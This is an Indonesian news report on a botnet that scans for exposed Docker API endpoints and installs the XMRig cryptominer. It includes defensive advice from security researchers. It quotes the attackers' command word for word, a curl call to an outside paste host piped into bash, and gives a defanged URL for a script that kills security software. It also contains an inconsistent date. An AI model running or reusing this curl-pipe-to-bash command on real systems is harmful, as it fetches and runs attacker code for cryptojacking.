Hati-hati, Grup Hacker Lagi Beroperasi Intai Pengguna Docker
Docker | Foto: ZDNet
Cyberthreat.id – Sebuah grup peretas (hacker) tengah mengincar platform Docker yang memiliki API endpoint online. Kampanye mereka terdeteksi sejak 24 November 2019.
Peneliti Bad Packets, perusahaan analisis serangan DDoS dan penyalahgunaan jaringan asal Chicago, AS, menemukan peretas telah menambang 14,82 koin Monero (XMR) atau setara US$ 740.
Docker adalah sebuah aplikasi open source yang berfungsi sebagai wadah atau stancecontainer untuk mengepak/memasukkan sebuah software secara lengkap beserta hal lainnya yang dibutuhkan oleh software tersebut dapat berfungsi.
Menurut peneliti, operasional yang dilakukan peretas tersebut saat ini berupa pemindaian secara massal. Tujuannya, memungkinkan peretas mengirimkan perintah ke instance Docker dan menggunakan penambang cryptocurrency pada instance Docker. Instance adalah struktur proses dan memory yang menjalankan sistem database.
Kepala Peneliti juga Co-founder Bad Packets LLC, Troy Mursch, mengatakan, kampanye peretas ini meningkat dalam skala besar. Oleh karenanya, butuh penyelidikan lebih lanjut untuk mengetahui apa yang sedang dilakukan oleh botnet tersebut.
Seperti dikutip dari ZDNet, Selasa (26 September 2019, Mursch mengatakan, operasi kampanye tersebut tampaknya bukan untuk mengeksploitasi skrip. Sejauh ini, grup yang berada di balik serangan ini sedang memindai lebih dari 59.000 jaringan IP (netblock) untuk mencari instance Docker yang terbuka.
Setelah grup mengidentifikasi host yang terbuka, penyerang akan menggunakan API endpoint untuk memulai wadah Alpine Linux OS di mana mereka menjalankan perintah berikut:
chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;
Perintah di atas akan mengunduh dan menjalankan skrip Bash dari server penyerang. Script ini menginstal penambang cryptocurrency XMRRig. Selain itu, operasi malware ini juga dilengkapi dengan langkah pertahanan diri.
Operasi malware itu juga menghapus instalan agen pemantau yang diketahui dan membunuh banyak proses melalui skrip yang diunduh dari http: // ix [.] Io / 1XQh.
Melalui skrip ini, terlihat peretas mematikan produk keamanan, tetapi mereka juga mematikan proses yang terkait dengan bot penambangan cryptocurrency saingan, seperti DDG.
Mursch menyarankan agar pengguna dan organisasi yang menjalankan instance Docker segera memeriksa apakah mereka mengekspos API endpoint di internet, lalu menutup port, dan kemudian menghentikan containers yang berjalan yang tidak dikenali.
Pendiri Sandfly Security, Craig H. Rowland, juga memperhatikan bahwa peretas juga membuat akun backdoor pada containers yang diretas dan meninggalkan kunci SSH untuk mendapatkan akses yang lebih mudah.
Redaktur: Andi Nugroho
